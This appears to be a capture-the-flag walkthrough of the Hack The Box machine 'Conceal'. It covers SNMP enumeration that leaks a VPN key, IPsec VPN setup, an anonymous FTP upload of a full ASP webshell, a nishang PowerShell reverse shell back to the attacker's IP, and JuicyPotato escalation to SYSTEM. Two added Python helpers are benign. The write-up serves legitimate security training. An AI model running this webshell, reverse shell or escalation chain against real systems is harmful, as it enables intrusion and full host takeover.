This particular scan was interesting: the regular (TCP) nmap scan did not return anything. When running a UDP scan, however, we were able to note down some interesting findings.
└─$ sudo nmap -sU 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-12 20:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.14s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp
It appears that port 500/udp is running ISAKMP (IKE), the protocol used to negotiate keys and establish an IPsec VPN connection. Information on this protocol can be found here:
Knowing that this is a vulnerable machine from Hack The Box, it is safe to assume that there is a key somewhere on this box that we can use in order to establish a VPN connection and gain access to other ports. Rerunning the nmap scan with service detection, we get the following results.
$ sudo nmap -sU -sC -sV -vv 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-12 21:00 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.116 [4 ports]
Completed Ping Scan at 21:00, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:00
Completed Parallel DNS resolution of 1 host. at 21:00, 0.06s elapsed
Initiating UDP Scan at 21:00
Scanning 10.10.10.116 [1000 ports]
UDP Scan Timing: About 27.55% done; ETC: 21:02 (0:01:22 remaining)
Discovered open port 500/udp on 10.10.10.116
Completed UDP Scan at 21:01, 50.63s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 1000 services on 10.10.10.116
Service scan Timing: About 0.40% done
Discovered open port 161/udp on 10.10.10.116
Discovered open|filtered port 161/udp on 10.10.10.116 is actually open
Looks like we have another open port, 161/udp, which is SNMP. We can tell that this is a Windows machine from the TTL of 127 in the response; if it were a number in the 60s we would have a Linux machine, and something like 200 would indicate a switch or some other networking device.
Enumerating via SNMP
SNMP is often misconfigured (for example, left readable with the default 'public' community string); we can enumerate it with the following command.
Doing so gives us a VPN password hash. Let's take a crack at it on hashes.org and see if it can be cracked.
Looks like we found a password: Dudecake1. It's safe to assume that this is the VPN password we will need to establish the VPN connection.
We can also enumerate using the snmp-check tool with the following command:
┌──(kali㉿kali)-[~]
└─$ snmp-check 10.10.10.116
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 10.10.10.116
Hostname : Conceal
Description : Hardware: AMD64 Family 23 Model 1 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
Contact : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
Location : -
Uptime snmp : 03:30:52.59
Uptime system : 03:30:35.90
System date : 2021-2-13 02:21:41.0
Domain : WORKGROUP
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49666 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
0.0.0.0 49670 0.0.0.0 0 listen
10.10.10.116 139 0.0.0.0 0 listen
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 500
0.0.0.0 4500
0.0.0.0 5050
0.0.0.0 5353
0.0.0.0 5355
0.0.0.0 60988
10.10.10.116 137
10.10.10.116 138
10.10.10.116 1900
10.10.10.116 53218
127.0.0.1 1900
127.0.0.1 53219
This also reveals TCP ports that we will not be able to reach until we establish a VPN connection. Looks like we will be going in through UDP ports 500 (ISAKMP) and 4500 (NAT-T).
Establishing VPN connection
Now that we have the VPN password, let's run ike-scan to enumerate more valuable information that we can use when building our VPN connection.
┌──(kali㉿kali)-[~]
└─$ sudo ike-scan 10.10.10.116 -M
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=eb797c8fbd3ed4a2)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.4: 1 hosts scanned in 0.124 seconds (8.04 hosts/sec). 1 returned handshake; 0 returned notify
The SA line gives us the encryption algorithm, hashing algorithm, Diffie-Hellman group, authentication type and lifetime. We will need these values when configuring our VPN file down the road. Quick note: the lifetime is printed in hex, and we can convert it via python:
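The conversion the post refers to, written out as an added example (not code from the original write-up or from ike-scan itself). It parses the SA= line shown above, turns the hex LifeDuration into seconds, derives the matching strongSwan ike= proposal, and flags the attributes a defender would want replaced; the attribute names follow ike-scan's output format and the weakness notes are my own assessment.

```python
"""Parse the SA= line returned by ike-scan and turn it into something usable.

Added example for this write-up (not part of the original post or of ike-scan).
"""
import re

# Captured from the ike-scan output above (same values as in the post).
SA_LINE = ("SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK "
           "LifeType=Seconds LifeDuration(4)=0x00007080)")

# Attribute keys follow ike-scan's print format: Name[(len)]=value
_ATTR_RE = re.compile(r"(\w+)(?:\(\d+\))?=([^\s)]+)")


def parse_sa(line):
    """Return the SA attributes as a dict, e.g. {'Enc': '3DES', ...}."""
    inner = line[line.index("(") + 1:line.rindex(")")]
    return dict(_ATTR_RE.findall(inner))


def life_duration_seconds(sa):
    """LifeDuration is printed as a hex string; 0x00007080 -> 28800 s (8 h)."""
    if sa.get("LifeType") != "Seconds":
        raise ValueError("LifeType is not in seconds: %r" % sa.get("LifeType"))
    return int(sa["LifeDuration"], 16)


def strongswan_ike_proposal(sa):
    """Build the strongSwan 'ike=' value, e.g. 3des-sha1-modp1024."""
    group = sa["Group"].split(":", 1)[-1]          # '2:modp1024' -> 'modp1024'
    return "-".join([sa["Enc"].lower(), sa["Hash"].lower(), group])


# Settings a defender would want to see replaced (assessment notes are mine).
WEAK = {
    "Enc": {"3DES": "64-bit block cipher (Sweet32); replace with AES"},
    "Hash": {"SHA1": "SHA-1 is deprecated for new deployments"},
    "Group": {"2:modp1024": "1024-bit DH is below current minimums"},
    "Auth": {"PSK": "pre-shared key; on this host it leaked via SNMP sysContact"},
}


def weak_settings(sa):
    """Return [(attribute, value, reason)] for every weak attribute found."""
    return [(k, sa[k], WEAK[k][sa[k]]) for k in WEAK if sa.get(k) in WEAK[k]]


if __name__ == "__main__":
    sa = parse_sa(SA_LINE)
    secs = life_duration_seconds(sa)
    print("IKE SA lifetime: %d s (%.1f h)" % (secs, secs / 3600))
    print("ipsec.conf proposal: ike=%s" % strongswan_ike_proposal(sa))
    for attr, val, why in weak_settings(sa):
        print("weak %s=%s: %s" % (attr, val, why))
```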
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
10.10.14.30 10.10.10.116 : PSK "Dudecake1!"
Next, edit the /etc/ipsec.conf file (with vi or your editor of choice) and add the connection:
└─$ sudo cat /etc/ipsec.conf
# Sample VPN connections
conn Conceal
authby=secret
auto=route
keyexchange=ikev1
ike=3des-sha1-modp1024
left=10.10.14.30
right=10.10.10.116
type=transport
esp=3des-sha1
rightprotoport=tcp
└─$ sudo ipsec up Conceal
initiating Main Mode IKE_SA Conceal[1] to 10.10.10.116
generating ID_PROT request 0 [ SA V V V V V ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (236 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (208 bytes)
parsed ID_PROT response 0 [ SA V V V V V V ]
received MS NT5 ISAKMPOAKLEY vendor ID
received NAT-T (RFC 3947) vendor ID
received draft-ietf-ipsec-nat-t-ike-02\n vendor ID
received FRAGMENTATION vendor ID
received unknown vendor ID: fb:1d:e3:cd:f3:41:b7:ea:16:b7:e5:be:08:55:f1:20
received unknown vendor ID: e3:a5:96:6a:76:37:9f:e7:07:22:82:31:e5:ce:86:52
selected proposal: IKE:3DES_CBC/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
generating ID_PROT request 0 [ KE No NAT-D NAT-D ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (244 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (260 bytes)
parsed ID_PROT response 0 [ KE No NAT-D NAT-D ]
generating ID_PROT request 0 [ ID HASH N(INITIAL_CONTACT) ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (100 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (68 bytes)
parsed ID_PROT response 0 [ ID HASH ]
IKE_SA Conceal[1] established between 10.10.14.30[10.10.14.30]...10.10.10.116[10.10.10.116]
scheduling reauthentication in 10123s
maximum IKE_SA lifetime 10663s
generating QUICK_MODE request 2443783256 [ HASH SA No ID ID ]
sending packet: from 10.10.14.30[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.30[500] (188 bytes)
parsed QUICK_MODE response 2443783256 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
CHILD_SA Conceal{2} established with SPIs cfea555b_i 1004a842_o and TS 10.10.14.30/32 === 10.10.10.116/32[tcp]
generating QUICK_MODE request 2443783256 [ HASH ]
connection 'Conceal' established successfully
Once the connection is established, we can check for TCP ports with the following nmap scan.
└─$ nmap -sT -p 445 10.10.10.116 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:35 EST
Nmap scan report for 10.10.10.116
Host is up (0.10s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Perfect, we have an established connection. Please note that you may need to restart your Kali VM in order to make it work; it took me a while of scratching my head. For some reason, the old-school "turn it off and on again" never seems to fail.
Also note that you cannot do SYN scans (-sS) over this VPN connection using nmap, so you will have to do a TCP connect scan (-sT) as above. Now that we have access, let's run a full TCP nmap scan and enumerate the results.
└─$ nmap -sT -sC -sV -oN nmap-TCP-VPN-scan 10.10.10.116
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 12:45 EST
Nmap scan report for 10.10.10.116
Host is up (0.10s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8m55s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-13T17:54:27
|_ start_date: 2021-02-12T22:51:05
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.09 seconds
Looks like we have FTP and a Microsoft web server. Usually this combination may be vulnerable to file-upload exploitation if anonymous FTP is allowed: we could upload a shell over FTP, reach it through the web server, and then execute code. Spooky stuff right there. Let's check it out.
Let's check for FTP access.
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
We have access! Next, let's check the web server and see if there is a file-uploads folder somewhere in there. Usually this is something like /upload or /uploads.
Uploading Our Shell
Now it is time to upload our shell. Microsoft IIS serves either .asp or .aspx files, so let's test both of them.
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ echo "test" > test.asp
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.asp
local: test.asp remote: test.asp
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
6 bytes sent in 0.00 secs (20.9263 kB/s)
ftp>
Looks like we can upload both. It also appears that the web server has a time limit, because it deletes uploaded files after a while; therefore we must be snappy and quick to run our reverse shell.
Download the following to execute commands:
┌──(kali㉿kali)-[/opt/webshell/asp]
└─$ cat shell.asp
GIF89a$ ;<hTml>
<% if request("miemie")="av" then %>
<%
on error resume next
testfile=Request.form("2010")
if Trim(request("2010"))<>"" then
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.CreateTextFile(testfile,True)
thisfile.Write(""&Request.form("1988") & "")
if err =0 Then
response.write"<font color=red>Success</font>"
else
response.write"<font color=red>False</font>"
end if
err.clear
thisfile.close
set fs = nothing
End if
%>
<style type="text/css">
<!--
#Layer1 {
position:absolute;
left:500px;
top:404px;
width:118px;
height:13px;
z-index:7;
}
.STYLE1 {color: #9900FF}
-->
</style>
<title>Welcome To AK Team</title>
<form method="POST" ACTION="">
<input type="text" size="54" name="2010"
value="<%=server.mappath("akt.asp")%>"> <BR>
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA>
<input type="submit" name="Send" value="GO!">
<div id="Layer1">- BY F4ck</div>
</form>
<% end if %>
</hTml>
shell.asp?miemie=av
We are going to upload this ASP file and use it to execute commands.
Now keep in mind that the file is removed every so often, so we need to be ready to keep re-uploading it, by any means necessary. Before we do so, download the following repo to gain access to our shell and copy the script into our FTP folder.
Establishing Reverse Connection
┌──(kali㉿kali)-[/opt/nishang/Shells]
└─$ cp Invoke-PowerShellTcp.ps1 ~/HTB/Conceal/ftp
┌──(kali㉿kali)-[/opt/nishang/Shells]
└─$ cd ~/HTB/Conceal/ftp
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ls
asp Invoke-PowerShellTcp.ps1 test.asp test.aspx webshell.asp
Edit the shell file by adding the following to the bottom of the script.
whoami /all
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv> whoami : ERROR: Unable to get user claims information.
At line:1 char:1
+ whoami /all
+ ~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (ERROR: Unable t...ms information.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Notice that SeImpersonatePrivilege is Enabled; this means the host is a candidate for the JuicyPotato exploit!
Similarly, just like we got the shell onto the web server, we are going to bring the JuicyPotato binary over and execute it manually. This can be done via FTP, or with the following command.
Note, before doing so, let's find out where on the Windows machine the uploaded file is stored. We want to know this because it is removed from that folder after a certain amount of time.
It appears to be in the following directory:
PS C:\inetpub\wwwroot\upload>
So once it is on the box, we are going to transfer it to
C:\Users\Destitute\Documents>
If that doesn't work, then we will try another folder, but we'll see how that goes. The efficient way to do this, after the file is uploaded, is with the following command:
cp C:\inetpub\wwwroot\upload\jp.exe .
Another way of getting the file onto the target is by executing the following command on the box, which downloads it from our HTTP server and puts it directly in the specified path.
Really the choice is up to you. In this instance we will be uploading via FTP.
Once it is uploaded into the server you will see the file as follows:
PS C:\Users\Destitute\Documents> dir
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/02/2021 19:21 348468 jp.exe
Running the file, you will see that it does not work. The reason is that the file was transferred in ASCII mode rather than binary mode, which corrupts an executable (compare the 348468 bytes above with the 347648 bytes of the correctly transferred binary below). You can switch ftp to binary mode before uploading.
PS C:\Users\Destitute\Documents> ./jp.exe
Directory: C:\Users\Destitute\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/02/2021 19:21 348468 jp.exe
PS C:\Users\Destitute\Documents> Invoke-PowerShellTcp : Program 'jp.exe' failed to run: The specified executable is not a valid application for this OS
platform.At line:1 char:1
+ ./jp.exe
+ ~~~~~~~~.
At line:127 char:1
+ Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port 9001
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShellTcp
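To make the failure mode concrete, here is an added example (not part of the original post) that simulates what FTP ASCII mode does to a binary: every bare LF is turned into CRLF, so the file grows by one byte per 0x0A and the DOS stub no longer points at the PE signature. The minimal PE-like byte string is constructed for the demonstration and is not a real executable.

```python
"""Why jp.exe broke: FTP ASCII mode rewrote line endings inside a binary.

Added example for this write-up; not from the original post.  A Unix ftp client
in ASCII (TYPE A) mode converts every bare LF (0x0A) it sends into CRLF.  Text
survives that; a PE executable does not, because its DOS stub message already
contains an LF, so everything after it shifts by one byte.
"""
import struct

# Real PE files carry this message in the DOS stub; note the embedded LF.
DOS_MSG = b"This program cannot be run in DOS mode.\r\r\n$"


def ascii_mode_transfer(data):
    """Simulate a TYPE A upload from a Unix client: LF -> CRLF."""
    return data.replace(b"\n", b"\r\n")


def binary_mode_transfer(data):
    """TYPE I (binary) sends the bytes verbatim."""
    return data


def pe_entry_offset(data):
    """Read e_lfanew (offset of the PE signature) from the DOS/MZ header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    return struct.unpack_from("<I", data, 0x3C)[0]


def looks_like_valid_pe(data):
    """True only if e_lfanew still points at the PE signature."""
    try:
        off = pe_entry_offset(data)
    except (ValueError, struct.error):
        return False
    return data[off:off + 4] == b"PE\0\0"


def build_fake_pe(payload):
    """Constructed minimal 'executable': 0x40-byte MZ header, DOS stub message,
    PE signature, then the payload.  Enough structure for the check above only."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", header, 0x3C, 0x40 + len(DOS_MSG))  # e_lfanew
    return bytes(header) + DOS_MSG + b"PE\0\0" + payload


def corruption_report(original):
    """Return (ascii_size, binary_size, lf_count, ascii_valid, binary_valid)."""
    via_ascii = ascii_mode_transfer(original)
    via_binary = binary_mode_transfer(original)
    return (len(via_ascii), len(via_binary), original.count(b"\n"),
            looks_like_valid_pe(via_ascii), looks_like_valid_pe(via_binary))


if __name__ == "__main__":
    # Constructed payload containing a few 0x0A bytes of its own.
    sample = build_fake_pe(b"\x90\x0a\x48\x89\x0a\x0a\xc3")
    print(corruption_report(sample))
```

The size difference equals the number of LF bytes in the file, which is why the ASCII-mode upload above is larger than the binary-mode one by a fixed amount.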
Putting FTP into binary mode
┌──(kali㉿kali)-[~/HTB/Conceal/ftp]
└─$ ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put jp.exe
Copying jp.exe to our desired folder
PS C:\inetpub\wwwroot\upload> dir
Directory: C:\inetpub\wwwroot\upload
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 13/02/2021 19:28 347648 jp.exe
PS C:\inetpub\wwwroot\upload> dir
PS C:\inetpub\wwwroot\upload> cp jp.exe C:\Users\Destitute\Documents
Execute
PS C:\Users\Destitute\Documents> ./jp.exe
JuicyPotato v0.1
Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
PS C:\Users\Destitute\Documents>
We are going to need a few things here:
-t: we will set * (try both CreateProcess calls)
-p: a program to launch, something that will execute a reverse shell
-l: a listening port
Let's create our program to launch a reverse shell back to Kali, yes, another reverse shell, this one executed as root. Before we create the program, let's edit ANOTHER .ps1 and change the port on which we will be receiving the reverse shell.
Run JuicyPotato with the following flags. This is going to attempt to get a token that impersonates SYSTEM and then run our bat file with elevated privileges.
PS C:\Users\Destitute\Documents> ./jp.exe -t * -p spooky.bat -l 7777
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7777
COM -> recv failed with error: 10038
We get a CLSID error. In order to fix that, we have to find another CLSID; there are different ones, and after some trial and error you can find a compatible one that is most likely to work. We looked at the Windows 10 Enterprise ones.
listening on [any] 9002 ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.116] 49700
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32>